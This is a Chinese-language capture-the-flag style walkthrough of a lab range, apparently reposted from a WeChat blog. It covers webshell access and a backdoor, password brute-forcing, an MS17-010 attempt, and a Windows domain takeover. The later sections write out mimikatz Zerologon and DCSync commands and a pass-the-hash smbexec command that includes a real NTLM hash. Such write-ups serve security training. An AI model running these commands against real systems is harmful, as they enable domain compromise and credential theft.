cyberstrikelab通关记录-lab3

admin 2025年4月1日23:37:30评论6 views字数 1727阅读5分45秒阅读模式

信息收集

先看fscan扫描记录

cyberstrikelab通关记录-lab3
img

看看这几个网站,去搜了一下漏洞发现存在后台getshell,直接进去,amdn/tao

cyberstrikelab通关记录-lab3cyberstrikelab通关记录-lab3

增加一个后门。

cyberstrikelab通关记录-lab3
img

内网渗透

192.168.20.30:88 open

192.168.20.30:53 open

192.168.20.30:139 open

192.168.20.20:139 open

192.168.20.10:139 open

192.168.20.30:135 open

192.168.20.20:135 open

192.168.20.10:135 open

192.168.20.30:389 open

192.168.20.30:445 open

192.168.20.20:445 open

192.168.20.10:445 open

192.168.20.30:464 open

192.168.20.30:593 open

192.168.20.30:636 open

192.168.20.30:3268 open

192.168.20.30:3269 open

192.168.20.20:3306 open

192.168.20.10:3306 open

192.168.20.10:3590 open

192.168.20.10:5040 open

192.168.20.20:5985 open

192.168.20.10:445 open

192.168.20.30:139 open

[*] NetInfo 

[*]192.168.20.20

   [->]cyberweb

   [->]192.168.20.20

[*] NetInfo 

[*]192.168.20.30

   [->]WIN-7NRTJO59O7N

   [->]192.168.20.30

[*] NetBios 192.168.20.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600

192.168.20.20:8055 open

有一个thinkphp框架

cyberstrikelab通关记录-lab3
img

但是没有扫出漏洞,看看有什么路径吧,也没有扫出来东西但是看到题目有提示

cyberstrikelab通关记录-lab3
img

那么去爆破下密码试试

cyberstrikelab通关记录-lab3
img

发现密码是admin123,直接连接就行

cyberstrikelab通关记录-lab3
img

ms17_010

还差一台30的机器打一下ms17010试试毕竟前面两台都是的

use admin/smb/ms17_010_command
set rhosts 192.168.20.30
set command type c:\flag.txt

但是发现好像不行,那就先上线到cs再说,这里先生成一个exe让第一个web上相然后转发上线,但是这里有个问题就是在20这台机器上,蚁剑无法上传文件会报错,所以就使用php去下载。

cyberstrikelab通关记录-lab3
img

已经下载了

cyberstrikelab通关记录-lab3
img

zerologon

shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /account:WIN-7NRTJO59O7N$ "exit"
cyberstrikelab通关记录-lab3
img

发现存在zerologon漏洞,那么去滞空下

shell mimikatz.exe "lsadump::zerologon /target:cyberstrikelab.com /ntlm /null /account:WIN-7NRTJO59O7N$ /exploit" "exit"
cyberstrikelab通关记录-lab3
img

接下来导出下域管理的hash

shell mimikatz.exe "lsadump::dcsync /csv /domain:cyberstrikelab.com /dc:WIN-7NRTJO59O7N.cyberstrikelab.com /user:administrator /authuser:WIN-7NRTJO59O7N$ /authpassword:"" /authntlm" "exit"
cyberstrikelab通关记录-lab3
img

然后打一个pth即可

proxychains4 python3 smbexec.py -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/[email protected]
cyberstrikelab通关记录-lab3
img

原文始发于微信公众号(0xh4ck3r):cyberstrikelab通关记录-lab3

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月1日23:37:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cyberstrikelab通关记录-lab3https://cn-sec.com/archives/3896326.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息